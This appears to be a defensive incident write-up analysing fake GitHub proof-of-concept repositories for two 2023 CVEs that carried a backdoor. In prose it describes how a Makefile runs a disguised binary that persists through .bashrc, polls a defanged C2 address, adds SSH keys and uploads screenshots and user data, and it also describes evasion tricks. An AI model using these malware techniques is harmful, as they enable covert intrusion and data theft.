Background
CVE-2023–20871 is a vulnerability demonstrated by STAR Labs security researchers at Pwn2Own Vancouver hacking competition. It is a stack-based buffer overflow in the Bluetooth virtual shared host device feature of Vmware virtual machines.
CVE-2023–35829 is a UAF(use-after-free) vulnerability in the rkvdec_remove function of drivers/staging/media/rkvdec/rkvdec.c in Linux kernel versions prior to 6.3.2.
Event
On July 3, 2023, a user named ChriSanders22 on GitHub published the PoC of CVE-2023–35829 and CVE-2023–20871.
On July 4, 2023, Twitter user st0ic3r discovered that the PoC was fake and contained a backdoor.
As of July 11, 2023, the user has deleted the repository and account, but there are still other users uploading the same PoC.
Technical Analysis
There are many suspicious signs in the PoC of CVE-2023–25829 files.
First is the Makefile file which its line 17 executes a ./src/aclocal.m4 file.
Examining this file with file and strings reveals many Linux system calls like getenv and getpid.
Reverse engineering the file with IDA, we could find that if the file name is not kworker then it makes a copy named kworker, then modifies .bashrc to execute this file on next restart of Bash Shell.
If the filename is kworker, it will call exeCommandFromC2 function every 120 seconds which executes the commands from C2 server http[:]//cunniloss[.]accesscam[.]org/hash.php, and gets the clear commands though decrypting with XOR 0x83.
The command will download script to take screenshots, add SSH keys, and compresses user data along with screenshots to upload to C2 server.
Reactions
On July 4, 2023, security researchers have discovered the fake PoC, and raised issue in the repo.
As of July 11, 2023, the ChriSanders22 account and fake PoC repo are deleted. But other users still have identical repos.
Lesson Learned
This event is a watering hole attack targeting security personnel. It uses fake PoCs with backdoors in Makefiles when researchers compile and execute it.
The fake PoC uses new namespace to map current UID to UID 0 (root). This makes id and whoami show root in the new shell. Also, the backdoor encodes C2 URLs in UTF-16 to evade strings and disassembly.
Watering hole attacks on security personnel are not rare. In June 2023, a fake PoC event for Microsoft Exchange was also used the same way.
In summary, security researchers should never trust public PoC code, and audit all code from GitHub or elsewhere for malice, especially exploits, or use safe virtual environments to test unfamiliar code.
